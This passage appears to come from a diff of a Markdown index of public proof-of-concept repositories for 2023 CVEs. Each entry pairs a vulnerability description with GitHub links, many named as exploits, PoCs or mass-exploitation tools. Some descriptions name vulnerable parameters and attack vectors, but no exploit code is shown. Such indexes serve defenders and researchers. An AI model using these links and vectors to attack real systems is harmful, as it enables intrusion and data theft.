2023-02-19 mishandle Input Validation (issue 1 of 4). + + +- [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067) + +### CVE-2023-26136 (2023-07-01) + +Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized. + + +- [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment) +- [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security) +- [m-lito13/SealSecurity_Exam](https://github.com/m-lito13/SealSecurity_Exam) + +### CVE-2023-26144 (2023-09-20) + +Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.\r\r**Note:** It was not proven that this vulnerability can crash the process. + + +- [tadhglewis/apollo-koa-minimal](https://github.com/tadhglewis/apollo-koa-minimal) + +### CVE-2023-26255 (2023-02-28) + +An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system. + + +- [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp) +- [Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6) + +### CVE-2023-26256 (2023-02-28) + +An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system. + + +- [0x7eTeam/CVE-2023-26256](https://github.com/0x7eTeam/CVE-2023-26256) +- [xhs-d/CVE-2023-26256](https://github.com/xhs-d/CVE-2023-26256) +- [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256) +- [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256) + +### CVE-2023-26258 (2023-07-03) + +Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator. + + +- [mdsecactivebreach/CVE-2023-26258-ArcServe](https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe) + +### CVE-2023-26262 (2023-03-14) + +An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, a unrestricted language file upload vulnerability exists the can lead to direct code execution on the content management (CM) server. + + +- [istern/CVE-2023-26262](https://github.com/istern/CVE-2023-26262) + +### CVE-2023-26269 (2023-04-03) + +Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a \nmalicious local user.\n\nAdministrators are advised to disable JMX, or set up a JMX password.\n\nNote that version 3.7.4 onward will set up a JMX password automatically for Guice users.\n\n\n + + +- [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269) + +### CVE-2023-26360 (2023-03-23) + +Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. + + +- [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360) +- [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit) +- [CuriousLearnerDev/ColdFusion_EXp](https://github.com/CuriousLearnerDev/ColdFusion_EXp) +- [issamjr/CVE-2023-26360](https://github.com/issamjr/CVE-2023-26360) + +### CVE-2023-26469 (2023-08-17) + +In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + + +- [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469) + +### CVE-2023-26563 (2023-07-12) + +The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server. + + +- [RupturaInfoSec/CVE-2023-26563-26564-26565](https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565) + +### CVE-2023-26602 (2023-02-26) + +ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution. + + +- [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602) + +### CVE-2023-26607 (2023-02-26) + +In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c. + + +- [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607) + +### CVE-2023-26609 (2023-02-27) + +ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field. + + +- [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609) + +### CVE-2023-26692 (2023-03-30) + +ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k is vulnerable to Cross Site Scripting (XSS). + + +- [bigzooooz/CVE-2023-26692](https://github.com/bigzooooz/CVE-2023-26692) + +### CVE-2023-26785 (2024-10-17) + +MariaDB v10.5 was discovered to contain a remote code execution (RCE) vulnerability via UDF Code in a Shared Object File, followed by a "create function" statement. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2023-26785](https://github.com/Ant1sec-ops/CVE-2023-26785) + +### CVE-2023-26818 (2023-05-19) + +Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone ,or video recording via the DYLD_INSERT_LIBRARIES flag. + + +- [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818) + +### CVE-2023-26852 (2023-04-12) + +An arbitrary file upload vulnerability in the upload plugin of Textpattern v4.8.8 and below allows attackers to execute arbitrary code by uploading a crafted PHP file. + + +- [leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-](https://github.com/leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-) + +### CVE-2023-26866 (2023-04-04) + +GreenPacket OH736's WR-1200 Indoor Unit, OT-235 with firmware versions M-IDU-1.6.0.3_V1.1 and MH-46360-2.0.3-R5-GP respectively are vulnerable to remote command injection. Commands are executed using pre-login execution and executed with root privileges allowing complete takeover. + + +- [lionelmusonza/CVE-2023-26866](https://github.com/lionelmusonza/CVE-2023-26866) + +### CVE-2023-26976 (2023-04-04) + +Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function. + + +- [FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow) + +### CVE-2023-26982 (2023-03-29) + +Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function. + + +- [bypazs/CVE-2023-26982](https://github.com/bypazs/CVE-2023-26982) +- [bypazs/Duplicate-of-CVE-2023-26982](https://github.com/bypazs/Duplicate-of-CVE-2023-26982) + +### CVE-2023-26984 (2023-03-29) + +An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request. + + +- [bypazs/CVE-2023-26984](https://github.com/bypazs/CVE-2023-26984) + +### CVE-2023-27035 (2023-05-01) + +An issue discovered in Obsidian Canvas 1.1.9 allows remote attackers to send desktop notifications, record user audio and other unspecified impacts via embedded website on the canvas page. + + +- [fivex3/CVE-2023-27035](https://github.com/fivex3/CVE-2023-27035) + +### CVE-2023-27100 (2023-03-22) + +Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests. + + +- [DarokNET/CVE-2023-27100](https://github.com/DarokNET/CVE-2023-27100) +- [fabdotnet/CVE-2023-27100](https://github.com/fabdotnet/CVE-2023-27100) + +### CVE-2023-27163 (2023-03-31) + +request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request. + + +- [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163) +- [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163) +- [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163) +- [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC) +- [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163) +- [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53) +- [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163) +- [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163) +- [cowsecurity/CVE-2023-27163](https://github.com/cowsecurity/CVE-2023-27163) +- [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber) +- [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163) +- [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft) +- [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163) +- [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163) +- [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163) +- [Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning](https://github.com/Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning) +- [btar1gan/exploit_CVE-2023-27163](https://github.com/btar1gan/exploit_CVE-2023-27163) + +### CVE-2023-27216 (2023-04-12) + +An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page. + + +- [FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection) +- [HoangREALER/CVE-2023-27216](https://github.com/HoangREALER/CVE-2023-27216) + +### CVE-2023-27326 (2024-05-03) + +Parallels Desktop Toolgate Directory Traversal Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system.\n. Was ZDI-CAN-18933. + + +- [Impalabs/CVE-2023-27326](https://github.com/Impalabs/CVE-2023-27326) +- [Malwareman007/CVE-2023-27326](https://github.com/Malwareman007/CVE-2023-27326) + +### CVE-2023-27327 (2024-05-03) + +Parallels Desktop Toolgate Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18964. + + +- [kn32/parallels-plist-escape](https://github.com/kn32/parallels-plist-escape) + +### CVE-2023-27350 (2023-04-20) + +This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987. + + +- [MaanVader/CVE-2023-27350-POC](https://github.com/MaanVader/CVE-2023-27350-POC) +- [imancybersecurity/CVE-2023-27350-POC](https://github.com/imancybersecurity/CVE-2023-27350-POC) +- [horizon3ai/CVE-2023-27350](https://github.com/horizon3ai/CVE-2023-27350) +- [adhikara13/CVE-2023-27350](https://github.com/adhikara13/CVE-2023-27350) +- [ThatNotEasy/CVE-2023-27350](https://github.com/ThatNotEasy/CVE-2023-27350) +- [Jenderal92/CVE-2023-27350](https://github.com/Jenderal92/CVE-2023-27350) +- [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350) +- [rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability](https://github.com/rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability) + +### CVE-2023-27363 (2024-05-03) + +Foxit PDF Reader exportXFAData Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the exportXFAData method. The application exposes a JavaScript interface that allows writing arbitrary files. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19697. + + +- [qwqdanchun/CVE-2023-27363](https://github.com/qwqdanchun/CVE-2023-27363) +- [webraybtl/CVE-2023-27363](https://github.com/webraybtl/CVE-2023-27363) +- [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-) + +### CVE-2023-27372 (2023-02-28) + +SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + + +- [nuts7/CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372) +- [Chocapikk/CVE-2023-27372](https://github.com/Chocapikk/CVE-2023-27372) +- [dream434/CVE-2023-27372](https://github.com/dream434/CVE-2023-27372) +- [0SPwn/CVE-2023-27372-PoC](https://github.com/0SPwn/CVE-2023-27372-PoC) +- [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC) +- [ThatNotEasy/CVE-2023-27372](https://github.com/ThatNotEasy/CVE-2023-27372) +- [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC) +- [1amthebest1/CVE-2023-27372](https://github.com/1amthebest1/CVE-2023-27372) + +### CVE-2023-27470 (2023-09-11) + +BASupSrvcUpdater.exe in N-able Take Control Agent through 7.0.41.1141 before 7.0.43 has a TOCTOU Race Condition via a pseudo-symlink at %PROGRAMDATA%\GetSupportService_N-Central\PushUpdates, leading to arbitrary file deletion. + + +- [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise) + +### CVE-2023-27524 (2023-04-24) + +Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.\n\nAll superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database.\nAdd a strong SECRET_KEY to your `superset_config.py` file like:\n\nSECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>\n\nAlternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.\n + + +- [horizon3ai/CVE-2023-27524](https://github.com/horizon3ai/CVE-2023-27524) +- [Okaytc/Superset_auth_bypass_check](https://github.com/Okaytc/Superset_auth_bypass_check) +- [ZZ-SOCMAP/CVE-2023-27524](https://github.com/ZZ-SOCMAP/CVE-2023-27524) +- [MaanVader/CVE-2023-27524-POC](https://github.com/MaanVader/CVE-2023-27524-POC) +- [ThatNotEasy/CVE-2023-27524](https://github.com/ThatNotEasy/CVE-2023-27524) +- [TardC/CVE-2023-27524](https://github.com/TardC/CVE-2023-27524) +- [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524) +- [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE) +- [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-) +- [h1n4mx0/Research-CVE-2023-27524](https://github.com/h1n4mx0/Research-CVE-2023-27524) +- [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524) +- [Cappricio-Securities/CVE-2023-27524](https://github.com/Cappricio-Securities/CVE-2023-27524) + +### CVE-2023-27532 (2023-03-10) + +Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts. + + +- [horizon3ai/CVE-2023-27532](https://github.com/horizon3ai/CVE-2023-27532) +- [sfewer-r7/CVE-2023-27532](https://github.com/sfewer-r7/CVE-2023-27532) +- [puckiestyle/CVE-2023-27532-RCE-Only](https://github.com/puckiestyle/CVE-2023-27532-RCE-Only) + +### CVE-2023-27564 (2023-05-10) + +The n8n package 0.218.0 for Node.js allows Information Disclosure. + + +- [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564) + +### CVE-2023-27566 (2023-03-03) + +Cubism Core in Live2D Cubism Editor 4.2.03 allows out-of-bounds write via a crafted Section Offset Table or Count Info Table in an MOC3 file. + + +- [OpenL2D/moc3ingbird](https://github.com/OpenL2D/moc3ingbird) + +### CVE-2023-27587 (2023-03-13) + +ReadtoMyShoe, a web app that lets users upload articles and listen to them later, generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. + + +- [vagnerd/CVE-2023-27587-PoC](https://github.com/vagnerd/CVE-2023-27587-PoC) + +### CVE-2023-27703 (2023-04-12) + +The Android version of pikpak v1.29.2 was discovered to contain an information leak via the debug interface. + + +- [happy0717/CVE-2023-27703](https://github.com/happy0717/CVE-2023-27703) + +### CVE-2023-27704 (2023-04-12) + +Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS). + + +- [happy0717/CVE-2023-27704](https://github.com/happy0717/CVE-2023-27704) + +### CVE-2023-27742 (2023-05-16) + +IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login. + + +- [G37SYS73M/CVE-2023-27742](https://github.com/G37SYS73M/CVE-2023-27742) + +### CVE-2023-27746 (2023-04-13) + +BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted. + + +- [eyJhb/blackvue-cve-2023](https://github.com/eyJhb/blackvue-cve-2023) + +### CVE-2023-27842 (2023-03-21) + +Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php compenent + + +- [tristao-marinho/CVE-2023-27842](https://github.com/tristao-marinho/CVE-2023-27842) +- [cowsecurity/CVE-2023-27842](https://github.com/cowsecurity/CVE-2023-27842) + +### CVE-2023-27997 (2023-06-13) + +A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. + + +- [rio128128/CVE-2023-27997-POC](https://github.com/rio128128/CVE-2023-27997-POC) +- [BishopFox/CVE-2023-27997-check](https://github.com/BishopFox/CVE-2023-27997-check) +- [imbas007/CVE-2023-27997-Check](https://github.com/imbas007/CVE-2023-27997-Check) +- [puckiestyle/cve-2023-27997](https://github.com/puckiestyle/cve-2023-27997) +- [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS) +- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997) +- [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997) +- [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997) +- [node011/CVE-2023-27997-POC](https://github.com/node011/CVE-2023-27997-POC) + +### CVE-2023-28121 (2023-04-12) + +An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + + +- [gbrsh/CVE-2023-28121](https://github.com/gbrsh/CVE-2023-28121) +- [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121) +- [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec) +- [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121) +- [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121) +- [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121) + +### CVE-2023-28197 (2024-01-10) + +An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data. + + +- [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol) + +### CVE-2023-28205 (2023-04-10) + +A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. + + +- [ntfargo/uaf-2023-28205](https://github.com/ntfargo/uaf-2023-28205) + +### CVE-2023-28206 (2023-04-10) + +An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. + + +- [acceleratortroll/acceleratortroll](https://github.com/acceleratortroll/acceleratortroll) + +### CVE-2023-28218 (2023-04-11) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [h1bAna/CVE-2023-28218](https://github.com/h1bAna/CVE-2023-28218) + +### CVE-2023-28229 (2023-04-11) + +Windows CNG Key Isolation Service Elevation of Privilege Vulnerability + + +- [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229) +- [byt3n33dl3/CrackKeyIso](https://github.com/byt3n33dl3/CrackKeyIso) + +### CVE-2023-28231 (2023-04-11) + +DHCP Server Service Remote Code Execution Vulnerability + + +- [TheHermione/CVE-2023-28231](https://github.com/TheHermione/CVE-2023-28231) + +### CVE-2023-28244 (2023-04-11) + +Windows Kerberos Elevation of Privilege Vulnerability + + +- [sk3w/cve-2023-28244](https://github.com/sk3w/cve-2023-28244) + +### CVE-2023-28252 (2023-04-11) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fortra/CVE-2023-28252](https://github.com/fortra/CVE-2023-28252) +- [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252) +- [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-) +- [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252) +- [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe) +- [byt3n33dl3/CLFS](https://github.com/byt3n33dl3/CLFS) +- [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252) + +### CVE-2023-28293 (2023-04-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [CrazyDaveX86/CVE-2023-28293](https://github.com/CrazyDaveX86/CVE-2023-28293) + +### CVE-2023-28324 (2023-06-30) + +A improper input validation vulnerability exists in Ivanti Endpoint Manager 2022 and below that could allow privilege escalation or remote code execution. + + +- [horizon3ai/CVE-2023-28324](https://github.com/horizon3ai/CVE-2023-28324) + +### CVE-2023-28329 (2023-03-23) + +Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers). + + +- [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329) + +### CVE-2023-28330 (2023-03-23) + +Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default. + + +- [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330) + +### CVE-2023-28343 (2023-03-14) + +OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php. + + +- [gobysec/CVE-2023-28343](https://github.com/gobysec/CVE-2023-28343) +- [superzerosec/CVE-2023-28343](https://github.com/superzerosec/CVE-2023-28343) +- [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343) + +### CVE-2023-28354 +- [stormfleet/CVE-2023-28354](https://github.com/stormfleet/CVE-2023-28354) + +### CVE-2023-28432 (2023-03-22) + +Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY`\nand `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. + + +- [Mr-xn/CVE-2023-28432](https://github.com/Mr-xn/CVE-2023-28432) +- [gobysec/CVE-2023-28432](https://github.com/gobysec/CVE-2023-28432) +- [Okaytc/minio_unauth_check](https://github.com/Okaytc/minio_unauth_check) +- [MzzdToT/CVE-2023-28432](https://github.com/MzzdToT/CVE-2023-28432) +- [acheiii/CVE-2023-28432](https://github.com/acheiii/CVE-2023-28432) +- [steponeerror/Cve-2023-28432-](https://github.com/steponeerror/Cve-2023-28432-) +- [Cuerz/CVE-2023-28432](https://github.com/Cuerz/CVE-2023-28432) +- [LHXHL/Minio-CVE-2023-28432](https://github.com/LHXHL/Minio-CVE-2023-28432) +- [h0ng10/CVE-2023-28432_docker](https://github.com/h0ng10/CVE-2023-28432_docker) +- [CHINA-china/MinIO_CVE-2023-28432_EXP](https://github.com/CHINA-china/MinIO_CVE-2023-28432_EXP) +- [TaroballzChen/CVE-2023-28432-metasploit-scanner](https://github.com/TaroballzChen/CVE-2023-28432-metasploit-scanner) +- [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432) +- [Chocapikk/CVE-2023-28432](https://github.com/Chocapikk/CVE-2023-28432) +- [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432) +- [unam4/CVE-2023-28432-minio_update_rce](https://github.com/unam4/CVE-2023-28432-minio_update_rce) +- [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432) +- [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432) +- [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432) +- [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432) + +### CVE-2023-28434 (2023-03-22) + +Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`. \n + + +- [AbelChe/evil_minio](https://github.com/AbelChe/evil_minio) + +### CVE-2023-28447 (2023-03-28) + +Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability. + + +- [drkbcn/lblfixer_cve_2023_28447](https://github.com/drkbcn/lblfixer_cve_2023_28447) + +### CVE-2023-28467 (2023-05-22) + +In MyBB before 1.8.34, there is XSS in the User CP module via the user email field. + + +- [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467) + +### CVE-2023-28588 (2023-12-05) + +Transient DOS in Bluetooth Host while rfc slot allocation. + + +- [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588) +- [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588) +- [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt) +- [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile) +- [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588) +- 